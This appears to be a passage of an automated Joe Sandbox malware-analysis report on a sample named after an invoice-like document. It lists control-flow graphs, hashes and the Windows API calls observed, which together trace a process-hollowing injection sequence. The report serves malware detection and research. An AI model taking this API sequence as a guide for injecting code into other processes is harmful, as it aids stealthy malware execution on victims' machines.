                                          control_flow_graph 369 671afd8-671b06d 371 671b0a6-671b0c6 369->371 372 671b06f-671b079 369->372 377 671b0c8-671b0d2 371->377 378 671b0ff-671b12e 371->378 372->371 373 671b07b-671b07d 372->373 375 671b0a0-671b0a3 373->375 376 671b07f-671b089 373->376 375->371 379 671b08b 376->379 380 671b08d-671b09c 376->380 377->378 381 671b0d4-671b0d6 377->381 388 671b130-671b13a 378->388 389 671b167-671b221 CreateProcessA 378->389 379->380 380->380 382 671b09e 380->382 383 671b0f9-671b0fc 381->383 384 671b0d8-671b0e2 381->384 382->375 383->378 386 671b0e4 384->386 387 671b0e6-671b0f5 384->387 386->387 387->387 390 671b0f7 387->390 388->389 391 671b13c-671b13e 388->391 400 671b223-671b229 389->400 401 671b22a-671b2b0 389->401 390->383 393 671b161-671b164 391->393 394 671b140-671b14a 391->394 393->389 395 671b14c 394->395 396 671b14e-671b15d 394->396 395->396 396->396 397 671b15f 396->397 397->393 400->401 411 671b2c0-671b2c4 401->411 412 671b2b2-671b2b6 401->412 413 671b2d4-671b2d8 411->413 414 671b2c6-671b2ca 411->414 412->411 415 671b2b8 412->415 417 671b2e8-671b2ec 413->417 418 671b2da-671b2de 413->418 414->413 416 671b2cc 414->416 415->411 416->413 420 671b2fe-671b305 417->420 421 671b2ee-671b2f4 417->421 418->417 419 671b2e0 418->419 419->417 422 671b307-671b316 420->422 423 671b31c 420->423 421->420 422->423 424 671b31d 423->424 424->424
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0671B20E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: Tt$Tt
                                          • API String ID: 963392458-2684252306
                                          • Opcode ID: 6794b3c4b2731839c7c153ae48b6c9912867487a8213ccd0391863031a3aa52d
                                          • Instruction ID: df1ac4547d5062347e825f0db611a8c587223163a1e4bee637d460d68db2fab7
                                          • Opcode Fuzzy Hash: 6794b3c4b2731839c7c153ae48b6c9912867487a8213ccd0391863031a3aa52d
                                          • Instruction Fuzzy Hash: 14915D71D00719CFEB54CFA9C841BEEBBB2BF48710F14856AE818AB280D7749985CF91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 515 b0b519-b0b537 516 b0b563-b0b567 515->516 517 b0b539-b0b546 call b09f98 515->517 519 b0b569-b0b573 516->519 520 b0b57b-b0b5bc 516->520 522 b0b548 517->522 523 b0b55c 517->523 519->520 526 b0b5c9-b0b5d7 520->526 527 b0b5be-b0b5c6 520->527 570 b0b54e call b0b7c0 522->570 571 b0b54e call b0b7b1 522->571 523->516 528 b0b5d9-b0b5de 526->528 529 b0b5fb-b0b5fd 526->529 527->526 531 b0b5e0-b0b5e7 call b0b1e0 528->531 532 b0b5e9 528->532 534 b0b600-b0b607 529->534 530 b0b554-b0b556 530->523 533 b0b698-b0b758 530->533 536 b0b5eb-b0b5f9 531->536 532->536 565 b0b760-b0b78b GetModuleHandleW 533->565 566 b0b75a-b0b75d 533->566 537 b0b614-b0b61b 534->537 538 b0b609-b0b611 534->538 536->534 540 b0b628-b0b631 call b0b1f0 537->540 541 b0b61d-b0b625 537->541 538->537 546 b0b633-b0b63b 540->546 547 b0b63e-b0b643 540->547 541->540 546->547 548 b0b661-b0b66e 547->548 549 b0b645-b0b64c 547->549 556 b0b670-b0b68e 548->556 557 b0b691-b0b697 548->557 549->548 551 b0b64e-b0b65e call b0b200 call b0b210 549->551 551->548 556->557 567 b0b794-b0b7a8 565->567 568 b0b78d-b0b793 565->568 566->565 568->567 570->530 571->530
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0B77E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID: Tt
                                          • API String ID: 4139908857-1302607582
                                          • Opcode ID: 0df61252578b12ffb8a986dfe9401756e54f73a03e1b0bf2a6477ccf4271e6be
                                          • Instruction ID: aa91ffc89e4d03279bc87c77302508603b9baba1bfa49c337f40ece47d771eba
                                          • Opcode Fuzzy Hash: 0df61252578b12ffb8a986dfe9401756e54f73a03e1b0bf2a6477ccf4271e6be
                                          • Instruction Fuzzy Hash: 0B816970A00B058FDB24CF29D455B5ABBF1FF88300F0089ADD48ADBA90DB75E946CB91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 572 b05e54-b05f21 CreateActCtxA 574 b05f23-b05f29 572->574 575 b05f2a-b05f84 572->575 574->575 582 b05f93-b05f97 575->582 583 b05f86-b05f89 575->583 584 b05fa8 582->584 585 b05f99-b05fa5 582->585 583->582 587 b05fa9 584->587 585->584 587->587
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00B05F11
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID: Tt
                                          • API String ID: 2289755597-1302607582
                                          • Opcode ID: 2b5f44f3ddbdc063e52e519c5a98b572c8cc58300740b41610002131b6b22273
                                          • Instruction ID: ff190d4072c1fa3b94621961b39c9046c7e0f876b65aa619334888539b5c8a6d
                                          • Opcode Fuzzy Hash: 2b5f44f3ddbdc063e52e519c5a98b572c8cc58300740b41610002131b6b22273
                                          • Instruction Fuzzy Hash: 2F4190B1C04B19CBDB24DFA9C844B9EBBF5FF49304F20816AD408AB295DBB56946CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 588 b04a60-b05f21 CreateActCtxA 591 b05f23-b05f29 588->591 592 b05f2a-b05f84 588->592 591->592 599 b05f93-b05f97 592->599 600 b05f86-b05f89 592->600 601 b05fa8 599->601 602 b05f99-b05fa5 599->602 600->599 604 b05fa9 601->604 602->601 604->604
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00B05F11
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID: Tt
                                          • API String ID: 2289755597-1302607582
                                          • Opcode ID: a88ae8d49ade9da06010288edff32f1a5b9ec3cac88cdd7ab03eec3f9f124c35
                                          • Instruction ID: e20a83fe321cd75682f9fbdecd64f46e5974a498122b7e1aaa82fa24eb189608
                                          • Opcode Fuzzy Hash: a88ae8d49ade9da06010288edff32f1a5b9ec3cac88cdd7ab03eec3f9f124c35
                                          • Instruction Fuzzy Hash: 5441A2B1D04B19CBEB24DFA9C844B9EBBF5BF49304F208069D408AB295D7B56945CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 605 671a949-671a99e 608 671a9a0-671a9ac 605->608 609 671a9ae-671a9ed WriteProcessMemory 605->609 608->609 611 671a9f6-671aa26 609->611 612 671a9ef-671a9f5 609->612 612->611
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0671A9E0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID: Tt
                                          • API String ID: 3559483778-1302607582
                                          • Opcode ID: b7de725eac101117d9b687c42178862a3226412cd4b89fe6e89095570cecc87f
                                          • Instruction ID: f85a125cb8005104ec4ad8f43aabc250a3b9b472d4d79dce6ae561bd7a860c1a
                                          • Opcode Fuzzy Hash: b7de725eac101117d9b687c42178862a3226412cd4b89fe6e89095570cecc87f
                                          • Instruction Fuzzy Hash: F9214875D003099FDB10CFAAC885BEEBBF5FF48310F10842AE958A7240C7799981CBA1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 616 671a950-671a99e 618 671a9a0-671a9ac 616->618 619 671a9ae-671a9ed WriteProcessMemory 616->619 618->619 621 671a9f6-671aa26 619->621 622 671a9ef-671a9f5 619->622 622->621
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0671A9E0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID: Tt
                                          • API String ID: 3559483778-1302607582
                                          • Opcode ID: 023e1d5d118ae7ab89e1dd793c250ad4a96fe278abb233b7102c00b53bf41a9d
                                          • Instruction ID: 5aefd4d9747562d62a41f2616f82b881fdb9d1e349ee311893c1b8dadd0fb37f
                                          • Opcode Fuzzy Hash: 023e1d5d118ae7ab89e1dd793c250ad4a96fe278abb233b7102c00b53bf41a9d
                                          • Instruction Fuzzy Hash: 94212775D003599FDB10CFAAC885BEEBBF5FF48310F10842AE958A7240C7799945CBA5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 626 b0da00-b0da9c DuplicateHandle 627 b0daa5-b0dac2 626->627 628 b0da9e-b0daa4 626->628 628->627
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B0D9CE,?,?,?,?,?), ref: 00B0DA8F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID: Tt
                                          • API String ID: 3793708945-1302607582
                                          • Opcode ID: 7d8ad2a9b9d28505d446b96d0c0f68d8297c21147b4134a8118be205aafaac3d
                                          • Instruction ID: 62c9287f3497bfd52369e63d7b02245e1721c30b52334a21367ae3e821b34d68
                                          • Opcode Fuzzy Hash: 7d8ad2a9b9d28505d446b96d0c0f68d8297c21147b4134a8118be205aafaac3d
                                          • Instruction Fuzzy Hash: E02105B59003499FDB10CFAAD484ADEBFF5FB48320F14805AE954A7350C374A945CF64

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 631 671a379-671a3cb 634 671a3db-671a3de 631->634 635 671a3cd-671a3d9 631->635 636 671a3e5-671a40b Wow64SetThreadContext 634->636 635->634 637 671a414-671a444 636->637 638 671a40d-671a413 636->638 638->637
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0671A3FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID: Tt
                                          • API String ID: 983334009-1302607582
                                          • Opcode ID: 87267694529f5ce43ee83b5739f3c381468fecbd53c4f201e431791fe38f860f
                                          • Instruction ID: f7ea13e734c28c384aeaa2a999df8454cd0ad4f7beab62adadfe05727b9c9f84
                                          • Opcode Fuzzy Hash: 87267694529f5ce43ee83b5739f3c381468fecbd53c4f201e431791fe38f860f
                                          • Instruction Fuzzy Hash: D3217C71D003098FDB10DFAAC4847EEBBF4EF48310F14842AD819A7241CB78A945CFA5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 642 671aa39-671aacd ReadProcessMemory 646 671aad6-671ab06 642->646 647 671aacf-671aad5 642->647 647->646
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0671AAC0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID: Tt
                                          • API String ID: 1726664587-1302607582
                                          • Opcode ID: ede35761d9df777ebf4b4915c3ceadf28c045ac11f0ca8c7cb0c68e843273288
                                          • Instruction ID: c5c74f9b28772827749b5dd961bbf2652a7ac63bb3796ea3e1505328df574c93
                                          • Opcode Fuzzy Hash: ede35761d9df777ebf4b4915c3ceadf28c045ac11f0ca8c7cb0c68e843273288
                                          • Instruction Fuzzy Hash: A92125B1C003099FDB10DFAAC880BEEBBF5FF48310F10842AE958A7250D7789941CBA1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 651 b0b414-b0da9c DuplicateHandle 653 b0daa5-b0dac2 651->653 654 b0da9e-b0daa4 651->654 654->653
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B0D9CE,?,?,?,?,?), ref: 00B0DA8F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID: Tt
                                          • API String ID: 3793708945-1302607582
                                          • Opcode ID: ad8195bd78532432cf38e9f6af23d0d295a45bf1b0e47a31470f932d4eb3f573
                                          • Instruction ID: e42cf778b48092c727b191716d52b31e31f20c4a66b6c5ebaf5bb6edde5be8b2
                                          • Opcode Fuzzy Hash: ad8195bd78532432cf38e9f6af23d0d295a45bf1b0e47a31470f932d4eb3f573
                                          • Instruction Fuzzy Hash: 8B21E3B5D043499FDB10DFAAD484AEEBFF4EB48310F24845AE918A7350D378A940CFA5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 657 671a380-671a3cb 659 671a3db-671a40b Wow64SetThreadContext 657->659 660 671a3cd-671a3d9 657->660 662 671a414-671a444 659->662 663 671a40d-671a413 659->663 660->659 663->662
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0671A3FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID: Tt
                                          • API String ID: 983334009-1302607582
                                          • Opcode ID: 7801498998f3e2bffb871c9f94d02efe3b6f3dd010bbd0424fa60efef8d06720
                                          • Instruction ID: cd472de4cf920e98312f9558f9198e505e4e4b18642caa7db9c631441f3d3f3f
                                          • Opcode Fuzzy Hash: 7801498998f3e2bffb871c9f94d02efe3b6f3dd010bbd0424fa60efef8d06720
                                          • Instruction Fuzzy Hash: 98215B71D003098FDB14DFAAC4847EEBBF4EF88324F14842AD819A7241CB78A945CFA5
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0671AAC0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID: Tt
                                          • API String ID: 1726664587-1302607582
                                          • Opcode ID: 4773f3188cc9b81a3c8902cd472ba3f8c798dfbec55215654410a340e84317d2
                                          • Instruction ID: 78a154b2e8a83ee1d1da6efa38879d4418d1b6612a0747d41fdbcb46764011ba
                                          • Opcode Fuzzy Hash: 4773f3188cc9b81a3c8902cd472ba3f8c798dfbec55215654410a340e84317d2
                                          • Instruction Fuzzy Hash: 282125B1D003499FDB10DFAAC880BEEBBF5FF48310F54842AE958A7250D7789945CBA5
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0B7F9,00000800,00000000,00000000), ref: 00B0BA0A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: Tt
                                          • API String ID: 1029625771-1302607582
                                          • Opcode ID: b54c47247b5705eb0e8f6714aa80fb8ea6b4253a19179f79d40b0249c964cc56
                                          • Instruction ID: 4eb7971e44c585225aa82834284bf5c9877a9c3e6e64ad03220cb944bb3d0bff
                                          • Opcode Fuzzy Hash: b54c47247b5705eb0e8f6714aa80fb8ea6b4253a19179f79d40b0249c964cc56
                                          • Instruction Fuzzy Hash: 0E1126B6D003498FDB24CF9AD444BDEFBF5EB88310F14842AD569A7240C375A946CFA5
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0671A8FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: Tt
                                          • API String ID: 4275171209-1302607582
                                          • Opcode ID: bba63a4257ced5fa99e33b7334133a6c8a378001f96eebdfef0e9c62aa771853
                                          • Instruction ID: 3289b7d12c90717b10be3fa51db02cd9e5e23f17b49be6aefb187e51de61b3ee
                                          • Opcode Fuzzy Hash: bba63a4257ced5fa99e33b7334133a6c8a378001f96eebdfef0e9c62aa771853
                                          • Instruction Fuzzy Hash: C2112976D003499FDB20DFAAC844BEEBBF5EF88320F24841AE555A7250C7799941CFA1
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0B7F9,00000800,00000000,00000000), ref: 00B0BA0A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: Tt
                                          • API String ID: 1029625771-1302607582
                                          • Opcode ID: e9c2d6b7f9daa1a3c8d86921567c28a24e91b6e5b552a181dd3458cd26afa763
                                          • Instruction ID: 403b4ee0fad919d69e3461ffbf83f328e7c613dafb5b5a79411f0858b70da1a1
                                          • Opcode Fuzzy Hash: e9c2d6b7f9daa1a3c8d86921567c28a24e91b6e5b552a181dd3458cd26afa763
                                          • Instruction Fuzzy Hash: 0F1126B6D003499FDB20CF9AC444BDEFBF4EB88320F10846AD919A7240C375A945CFA5
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0671A8FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: Tt
                                          • API String ID: 4275171209-1302607582
                                          • Opcode ID: 8da61811873c92b1316c83da8a5123025d79854edcf5db1c18a6193008a27a93
                                          • Instruction ID: b5908fb01ba998e8ff2d5b9295db4086ef43590841455971f6d111f6cdccb638
                                          • Opcode Fuzzy Hash: 8da61811873c92b1316c83da8a5123025d79854edcf5db1c18a6193008a27a93
                                          • Instruction Fuzzy Hash: 3B113A75D003499FDB20DFAAC8447EEBBF5EF88320F248419D515A7250C7759541CFA1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID: Tt
                                          • API String ID: 947044025-1302607582
                                          • Opcode ID: 16dc5d2ad7f112258bb4c626ddbb8cf803d801eb4d731bf1fea5d90664ccfeef
                                          • Instruction ID: 7df78a847d9448c0b607f1f94598663db2d818add7b26173db04c30f3502b09f
                                          • Opcode Fuzzy Hash: 16dc5d2ad7f112258bb4c626ddbb8cf803d801eb4d731bf1fea5d90664ccfeef
                                          • Instruction Fuzzy Hash: DA119D71D003088FDB20DFAAC4457EEFBF9EF88210F24842AD515A7240CB79A945CFA5
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID: Tt
                                          • API String ID: 947044025-1302607582
                                          • Opcode ID: 2953f5976e4b7f76fb0724d364c5b88698c15e4702f4e7f34729a5701fdf5b33
                                          • Instruction ID: ef1ecf71c34bb504ae9d9b953f5fcbd8f7aad73331c929ffd0df7f6bba5ce509
                                          • Opcode Fuzzy Hash: 2953f5976e4b7f76fb0724d364c5b88698c15e4702f4e7f34729a5701fdf5b33
                                          • Instruction Fuzzy Hash: FD113A71D003498FDB24DFAAC4447EEFBF5EF88220F24842AD519A7250C7796945CFA5
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0B77E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID: Tt
                                          • API String ID: 4139908857-1302607582
                                          • Opcode ID: 3477e1c0441e073991e8aa48a9b786033258837c62810b67903a1a59dac99eff
                                          • Instruction ID: 90b34083bb289a566288a1603f46356a486e8d8fea94f1d0e443d4782b7f2843
                                          • Opcode Fuzzy Hash: 3477e1c0441e073991e8aa48a9b786033258837c62810b67903a1a59dac99eff
                                          • Instruction Fuzzy Hash: 3311E3B6C007498FDB20CF9AD444BDEFBF5EB88314F14845AD419A7250C379A945CFA5
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0671ED45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID: Tt
                                          • API String ID: 410705778-1302607582
                                          • Opcode ID: e1382fa392f96645e128c59c4917afc7e919116ac8b2e118c8aad77421523fe2
                                          • Instruction ID: a30f20e39c407c2c0b67dcc1e2a34a042d46cb3b14fdce795f443b73599d5f58
                                          • Opcode Fuzzy Hash: e1382fa392f96645e128c59c4917afc7e919116ac8b2e118c8aad77421523fe2
                                          • Instruction Fuzzy Hash: 301106B5800349DFDB10DF9AC844BDEFBF8EB48310F24841AE954A7210C375A944CFA5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279551116.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_a2d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 762c987658bbfa6743df2460c60b105df41106551fcb964cbfc2b6b3de5dcc6e
                                          • Instruction ID: 37514192d37df29f5cd5f78cfdee8f248551aa3912c1d5aa6e3e2b0dc8239f28
                                          • Opcode Fuzzy Hash: 762c987658bbfa6743df2460c60b105df41106551fcb964cbfc2b6b3de5dcc6e
                                          • Instruction Fuzzy Hash: 912125B2504240DFDB15DF18E9C0B26BFA5FB98318F34C579E8090B257C376D856CAA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279551116.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_a2d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f142c6cbff2fdc9393ddf57be82f42ea9da988bd388d764bd97fb0ea09d1e58
                                          • Instruction ID: c0b17909cca87112391d16e5c6289213e596709bf61fe78ea53636d33bbacad6
                                          • Opcode Fuzzy Hash: 4f142c6cbff2fdc9393ddf57be82f42ea9da988bd388d764bd97fb0ea09d1e58
                                          • Instruction Fuzzy Hash: 5D2128B5504244DFDB05EF18E9C0B16BB65FB94324F24C579D90A0F257C336E856CAA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279598884.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_a3d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1de6379712c94c44a4bf100fc96fbac5d4de6099fa83027d424d09a1b1fcfae2
                                          • Instruction ID: 52fafa641b242bf3e8e61e14dd688772e2dbc3753d76eb18c03254f8abc0dad9
                                          • Opcode Fuzzy Hash: 1de6379712c94c44a4bf100fc96fbac5d4de6099fa83027d424d09a1b1fcfae2
                                          • Instruction Fuzzy Hash: 9B2104B1504304EFDB15DF90E9C0B66BBA5FB84314F24C66DF84A4B296C376D846CA61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279598884.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_a3d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2176e6b9a2b3a9b758e87480d58757ca3086c3d9c7f784040e4a6f4cbc112b1d
                                          • Instruction ID: 9ffc084102a6b2d153151dd6d1df36aa215460c52b9fb490350f23bdd356a3c2
                                          • Opcode Fuzzy Hash: 2176e6b9a2b3a9b758e87480d58757ca3086c3d9c7f784040e4a6f4cbc112b1d
                                          • Instruction Fuzzy Hash: 312122B1604300DFDB18DF20E8C0B26BBA5FB85714F24C56DE84B0B286C33AD847CA62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279551116.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_a2d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                          • Instruction ID: c14de258f7358af6c7bf241c0bd61f9b9cd232a521efd76aaacdc8e7b4de9667
                                          • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                          • Instruction Fuzzy Hash: AD11D376504280CFDB16CF14D5C4B16BF71FB94314F24C6A9D8494B657C33AD856CBA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279551116.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
